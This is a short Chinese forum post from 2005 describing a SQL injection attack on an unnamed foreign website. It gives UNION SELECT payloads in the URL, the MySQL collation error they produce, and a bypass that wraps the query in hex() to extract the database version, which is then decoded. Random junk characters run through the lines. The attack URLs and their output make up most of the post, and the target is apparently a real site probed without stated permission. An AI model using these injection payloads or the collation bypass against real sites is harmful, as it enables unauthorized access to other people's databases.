本文作者:SuperHei
r. w- I7 ~ [0 R/ V( M7 z文章性质:原创
: _; c! i$ _! M1 D: D) K发布日期:2005-10-18
% j, L: P" z- _测试个国外的站时:' i2 |% N4 r) J( k% {* V$ T
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
+ K( T x; E0 b/ w" n/ `: k返回错误:
# u( V V5 a9 q, I# h: I) dIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
) ~+ b# \7 n& }3 WMySQL Error No. 126
( V& \* c9 r$ f( Z" |/ g看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。4 ^; G/ o4 ] @% }& F
解决办法:转为其他编码如hex。; M) `/ R! w9 y/ \
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
0 [) A1 X1 p8 L# Y" ?* s成功得到hex(version())的值为:
( W, X7 O& a, I" z5 i9 `342E312E332D62657461
1 d0 o7 f% L! N' u' m& h2 i8 _回Mysql查询下得到:
4 j( h, S5 K( ~' Z Dmysql> select 0x342E312E332D62657461;& d4 X3 } [8 b* Y3 V
+------------------------+" [0 z, s2 O: y* U. F# f' E4 F
| 0x342E312E332D62657461 |
/ i' s6 t) i7 e9 r5 |8 i' m+------------------------+
( M5 U4 B) n: D0 \* L. j" V3 Y| 4.1.3-beta |
" l- F4 H' F" d. V6 C" e+------------------------++ M; n& S1 e5 Q0 f: H" q+ R) B0 g
1 row in set (0.00 sec)
7 i9 O4 w- h5 O( i, K$ U1 R# j6 R" R3 n* _* Y6 x0 w' {2 Z" D! k
|
发表于 2012-9-15 14:04:54
收藏
支持
反对